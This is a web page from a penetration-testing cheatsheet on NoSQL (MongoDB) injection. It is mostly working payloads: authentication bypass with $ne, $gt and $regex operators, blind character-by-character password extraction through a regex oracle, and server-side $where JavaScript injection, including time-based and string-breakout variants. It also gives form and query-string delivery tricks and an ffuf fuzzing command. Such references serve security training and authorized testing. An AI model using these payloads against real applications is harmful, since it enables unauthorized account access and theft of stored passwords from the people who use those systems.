← All Cheatsheets
web-pentest

NoSQL Injection

NoSQL injection (MongoDB-focused) — authentication bypass with operators, query operator injection, blind regex extraction, server-side $where JavaScript injection, JSON vs form delivery, and NoSQLMap/ffuf tooling.

1 views Jun 2026 lazyhackers
Authentication Bypass (5)
{"username":"admin","password":{"$ne":null}}
Operator injection — "not equal to null" matches any password
authbypass mongo
{"username":{"$ne":null},"password":{"$ne":null}}
Log in as the first user when both fields are bypassed
authbypass mongo
{"username":"admin","password":{"$gt":""}}
Greater-than-empty matches any set password
authbypass mongo
username=admin&password[$ne]=x
Form/URL-encoded operator injection
authbypass form
{"username":{"$regex":"^adm"},"password":{"$ne":1}}
Regex-match the username, bypass the password
authbypass regex
Query Operator Injection (5)
{"$ne":null}
Match anything that is not null
operator
{"$gt":""} / {"$lt":"~"}
Range operators to match populated fields
operator
{"$in":["admin","root"]}
Match any value from a list
operator
{"$exists":true}
Filter on field presence
operator
{"$regex":".*"}
Wildcard regex match
operator regex
Blind Extraction (Regex Oracle) (3)
password[$regex]=^a.*
Confirm the first character, then iterate the alphabet
blind regex extract
username=admin&password[$regex]=^p.*
Character-by-character extraction of a secret field
blind extract
true vs false response = an oracle for each guessed char
Boolean oracle drives blind NoSQLi
blind boolean
JavaScript Injection ($where) (4)
{"$where":"this.password.match(/.*/)"}
Run server-side JavaScript inside the query
jsinjection where
{"$where":"sleep(5000)"}
Time-based blind via $where
jsinjection time
'; return true; var x='
Break out of a string into the $where JS context
jsinjection breakout
{"$where":"function(){return this.role=='admin'}"}
Arbitrary JS predicate
jsinjection
Encoding & Delivery (3)
Content-Type: application/json with operator objects
Send real operator objects (not strings) in a JSON body
delivery json
param[$ne]=1 (x-www-form-urlencoded)
Express/PHP parse bracket params into nested operators
delivery form
?filter[$gt]=0
Operator injection through query-string bracket notation
delivery query
Tooling (3)
nosqlmap
Automated MongoDB / NoSQL injection + enumeration
tooling nosqlmap
ffuf -w operators.txt -u 'https://target.com/api?id[FUZZ]=1'
Fuzz operator names into bracket parameters
tooling ffuf
Burp: convert JSON string values into operator objects
Manual operator injection in Repeater
tooling burp

Related Articles

5
Web Hacking

JSON and YAML Unsafe Deserialization

Deep technical analysis of insecure deserialization across Java, PHP, Python, and Node.js …

20m read
Web Hacking

Supply Chain Attacks

Deep technical guide to software supply chain attacks — dependency confusion, malicious np…

16m read
Web Hacking

Cross-Site Scripting Mastery

Complete XSS guide covering all attack types, filter bypasses, CSP evasion, cookie stealin…

19m read
Web Hacking

File Upload to RCE

Complete file upload exploitation guide — MIME bypass, double extension tricks, polyglot J…

12m read
Web Hacking

Advanced SSRF

Complete SSRF exploitation guide — AWS IMDSv1/v2 credential theft, GCP/Azure metadata, bli…

16m read

Related Courses

2
Intermediate

Web Application Penetration Testing

Master web hacking from recon to reporting

30 · 9.3h
Intermediate

Bug Bounty Hunting — From Recon to Bounty

The practical playbook for finding real bugs on real targets. Recon methodology, vulnerabi…

0 · 7.2h